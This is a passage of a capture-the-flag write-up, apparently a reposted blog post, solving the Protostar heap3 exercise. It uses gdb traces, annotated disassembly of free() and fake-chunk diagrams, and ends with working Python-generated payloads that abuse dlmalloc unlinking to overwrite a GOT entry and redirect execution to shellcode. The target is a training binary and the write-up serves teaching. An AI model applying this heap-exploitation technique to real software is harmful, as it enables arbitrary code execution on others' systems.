edx,DWORD PTR [ebp-0x14]0x8049906 <free+226>: mov DWORD PTR [eax+0x8],edx <-- failed(gdb) i r eax edxeax 0x8048864 134514788edx 0x804b11c 134525212As part of the unlinking process, just as we have tried to write to the offset from the forward link to overwrite GOT, we have also attempted to write to the back link which was the address of the winner() function. Let's investigate memory characteristics of that address:(gdb) maintenance info sectionsExec file: `/opt/protostar/bin/heap3', file type elf32-i386. : 0x80487b0->0x804abdc at 0x000007b0: .text ALLOC LOAD READONLY CODE HAS_CONTENTS : 0x804b0e4->0x804b0e8 at 0x000030e4: .got ALLOC LOAD DATA HAS_CONTENTS 0x804b0e8->0x804b130 at 0x000030e8: .got.plt ALLOC LOAD DATA HAS_CONTENTS 0x804b130->0x804b138 at 0x00003130: .data ALLOC LOAD DATA HAS_CONTENTS 0x804b140->0x804b5d4 at 0x00003138: .bss ALLOCThe attempt to write to the address 0x8048864 (actually 0x8048864 + 0x8) failed because it is located in the .text section which is READONLY. The previous write to 0x804b128 - 0xc succeeded because the GOT section is writeable. Thus, we must find another address to write to puts() GOT entry that would be both executable and writeable at the same time. Let's try the first heap chunk 0x0804c008:(gdb) r `python -c 'print "A"*32'` `python -c 'print "B"*32 + "\xfc\xff\xff\xff" + "\xf0"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`Program received signal SIGSEGV, Segmentation fault.0x08049951 in free (mem=0x804c058) at common/malloc.c:3648Another segmentation fault. Before we analyze and try to bypass this crash, let's see if the unlinking succeeded:(gdb) x/12x 0x0804c008-80x804c000: 0x00000000 0x00000029 0x41414141 0x414141410x804c010: 0x0804b11c 0x41414141 0x41414141 0x414141410x804c020: 0x41414141 0x41414141 0x00000000 0x00000029(gdb) x/x 0x804b1280x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x0804c008The second mov operation successfully wrote to 0x804c008.Virtual Next Chunk(s)With the GOT entry overwritten with the address on the heap, we are now ready to massage the input so it successfully completes by analyzing the crash:(gdb) x/i $eip0x8049951 <free+301>: mov DWORD PTR [eax+0xc],edx(gdb) i r eax edxeax 0x0 0edx 0x0 0Just as before, the crash was caused due to an attempt to write to an invalid address. Let's reverse engineer the free() function a bit further to see how this can be alleviated:0x8049909 <free+229>: mov eax,DWORD PTR [ebp-0x38] ; bin0x804990c <free+232>: mov eax,DWORD PTR [eax+0x2c] ; bin[0x2c]0x804990f <free+235>: cmp eax,DWORD PTR [ebp-0x28] ; compare with next_chunk0x8049912 <free+238>: je 0x80499b6 <free+402>0x8049918 <free+244>: mov eax,DWORD PTR [ebp-0x24] ; next_chunk_size0x804991b <free+247>: mov edx,DWORD PTR [ebp-0x28] ; next_chunk0x804991e <free+250>: lea eax,[edx+eax*1] ; next_next_chunk0x8049921 <free+253>: mov eax,DWORD PTR [eax+0x4] ; next_next_chunk_size0x8049924 <free+256>: and eax,0x1 ; PREV_INUSE0x8049927 <free+259>: mov DWORD PTR [ebp-0x20],eax ; store flag value0x804992a <free+262>: mov eax,DWORD PTR [ebp-0x28] ; next_chunk0x804992d <free+265>: mov edx,DWORD PTR [ebp-0x24] ; next_chunk_size0x8049930 <free+268>: mov DWORD PTR [eax+0x4],edx ; store next_chunk_size0x8049933 <free+271>: cmp DWORD PTR [ebp-0x20],0x0 ; check PREV_INUSE0x8049937 <free+275>: jne 0x8049963 <free+319> ; jump if the flag is set0x8049939 <free+277>: mov eax,DWORD PTR [ebp-0x28] ; next_chunk0x804993c <free+280>: mov eax,DWORD PTR [eax+0x8] ; next_chunk->fd0x804993f <free+283>: mov DWORD PTR [ebp-0x14],eax ; FD0x8049942 <free+286>: mov eax,DWORD PTR [ebp-0x28] ; next_chunk0x8049945 <free+289>: mov eax,DWORD PTR [eax+0xc] ; next_chunk-bk0x8049948 <free+292>: mov DWORD PTR [ebp-0x18],eax ; BK0x804994b <free+295>: mov eax,DWORD PTR [ebp-0x14] ; FD0x804994e <free+298>: mov edx,DWORD PTR [ebp-0x18] ; BK0x8049951 <free+301>: mov DWORD PTR [eax+0xc],edx ; FD->bk = BK <-- crash0x8049954 <free+304>: mov eax,DWORD PTR [ebp-0x18] ; BK0x8049957 <free+307>: mov edx,DWORD PTR [ebp-0x14] ; FD0x804995a <free+310>: mov DWORD PTR [eax+0x8],edx ; BK->fd = FD <-- crashThe disassembly above should look very familiar to the unlink operation we have done to make the original write. In fact, just as we have done the backward consolidation with the previous chunk, we are doing a similar forward consolidation with the next chunk. This could be used to make another 4 byte write; however, since we only need one write to solve the exercise, let's find a way to simply skip this block of instructions by triggering the following jump:0x8049933 <free+271>: cmp DWORD PTR [ebp-0x20],0x0 ; check PREV_INUSE0x8049937 <free+275>: jne 0x8049963 <free+319> ; jump if the flag is setThis can be arranged by setting up another fake chunk by manipulating the overflown chunk size to be a negative number like \xf0\xff\xff\xff (-16) while still having the least two significant bits set to 0 in order to pass earlier checks: /------ Chunk A -------\ /------ Chunk B -----------------------\ /-- Chunk C ..+----+----+--------------+----+----+------------------------------+----+----+-----| | | AAAA | | | BBBB... BBBB \xff\xff... | -4| -16| ..+----+----+--------------+----+----+------------------------------+----+----+----- .` `. .` `. .` `. /--- Next Next Chunk --\ :/----- Next Chunk -----\: +------+------+----------+ +------+------+----------+ |.. |..\xff| ... ... | |.. |..\xff| ... ... | +--> +------+------+----------+ +------+------+----------+ | | | | size --+ | | | +-------------------------------------------------+The next chunk is calculated relative to the original overflown chunk by adding (-16) to it, thus ending up 16 bytes behind Chunk C. The size of the next chunk is calculated by zeroing out the last two bits, thus if we set the size of the virtual next chunk to \xff\xff\xff\xff, the actual recorded size will be 0xfffffffc or -4. When the piece of code above attempts to retrieve the "next next" chunk it will add -4 to the next chunk address thus ending up exactly 4 bytes behind the next chunk. By setting the "next next" chunk's size to have the least significant bit set (e.g. \x01) we can skip the block of code that caused the memory write fault:(gdb) r `python -c 'print "\xcc"*32'` <-- shellcode next next chunk size --+ +-- next chunk size | | `python -c 'print "B"*16 + "\x01"*4 + "\xff"*4 + "B"*8 + "\xfc\xff\xff\xff" + "\xf0\xff\xff\xff"'` | | +-- prev chunk size +-- chunk size (-4) (-16) `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'` | | puts() GOT entry --+ shellcode in chunk A --+Program received signal SIGTRAP, Trace/breakpoint trap.0x0804c00d in ?? ()(gdb) x/12x $eip-10x804c00c: 0xcccccccc 0x0804b11c 0xcccccccc 0xcccccccc0x804c01c: 0xcccccccc 0xcccccccc 0xcccccccc 0x000000000x804c02c: 0x00000029 0x00000000 0x42424242 0x42424242Following all of the above manipulations the execution flow will end up in the shellcode located in the first chunk.Finalizing the exploitAt this point we can deal with the corrupted byte at 0x804c010 by simply jumping over it with a short 2 byte jump, followed by a push/ret pivot to get to the final destination - the winner function:$ ./heap3 `python -c 'print "AAAA" + "\xeb\x06" + "\x90"*6 + "\x68\x64\x88\x04\x08\xc3"'` `python -c 'print "B"*16 + "\x01"*4 + "\xff"*4 + "B"*8 + "\xfc\xff\xff\xff" + "\xf0\xff\xff\xff"'` `python -c 'print "CCCC"+"\x1c\xb1\x04\x08"+"\x08\xc0\x04\x08"'`that wasn't too bad now, was it? @ 1398039369The payload can be further optimized to make it less verbose at the expense of readability:$ ./heap3 `python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "\xff"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`that wasn't too bad now, was it? @ 1398049859External Links and References Exploit Exercises - Protostar Doug Lea Malloc w00w00 on Heap Overflows Phrack 57 - Vudo - An object superstitiously believed to embody magical powers Phrack 57 - Once upon a free()...Special NoteThanks to the folks at Exploit Exercises for creating the excellent wargame. Particularly making the exercises highly pedagogical with progressive difficulty and building on previously learned material.Published on May 25th, 2014 by iphelixSursa: https://thesprawl.org/research/exploit-exercises-protostar-heap/ Edited May 25, 2014 by Nytro Quote